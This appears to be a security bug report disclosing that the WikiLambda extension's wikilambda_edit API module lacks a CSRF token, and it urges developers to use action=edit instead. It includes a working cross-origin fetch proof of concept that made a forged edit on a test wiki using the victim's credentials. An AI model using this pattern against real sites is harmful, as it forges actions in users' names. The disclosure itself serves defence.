The WikiLambda extension introduces a ZObject namespace and corresponding content model. For reasons unknown to me, editing this content model directly via action=edit has been disabled. Instead, there is a wikilambda_edit module – but this module has no token parameter, making it vulnerable to cross-site request forgery:
let formData = new FormData(); formData.append('action', 'wikilambda_edit'); formData.append('zid', 'Z10006'); formData.append('zobject', ` { "Z1K1": "Z2", "Z2K1": "Z10006", "Z2K2": { "Z1K1": "Z7", "Z7K1": "Z802", "Z802K1": { "Z1K1": "Z40", "Z40K1": "Z41" }, "Z802K2": { "Z1K1": "This result" }, "Z802K3": { "Z1K1": "Not this one" } }, "Z2K3": { "Z1K1": "Z12", "Z12K1": [ { "Z1K1": "Z11", "Z11K1": "Z1002", "Z11K2": "Example function call" }, { "Z1K1": "Z11", "Z11K1": "Z1004", "Z11K2": "Exemple d’appel de fonction" }, { "Z1K1": "Z11", "Z11K1": "Z1728", "Z11K2": "فراخوانی تابع نمونه" } ] } } `); formData.append('summary', 'change label language codes to ZIDs'); fetch('https://notwikilambda.toolforge.org/w/api.php', { method: 'POST', mode: 'cors', credentials: 'include', body: formData, });
After running this code on tmp.lucaswerkmeister.de, this edit was made. (The link goes to the permalink, rather than the diff, because the old revision can’t be loaded for unrelated reasons; see T284368.)
I urge the WikiLambda development team to drop this custom API module, and just use action=edit directly. Apart from not lacking basic security measures, action=edit also has many other features, such as adding change tags, marking edits as minor, or specifying a base revision ID to detect edit conflicts; I see little reason to reimplement all of these in a custom API module. (Wikibase has a comparable wbeditentity API module, which also lacks some action=edit features, but I assume that this is because Wikibase partially predates the MediaWiki ContentHandler system, and using action=edit would not have provided adequate control over the content at the time – I hope that this is no longer an issue.)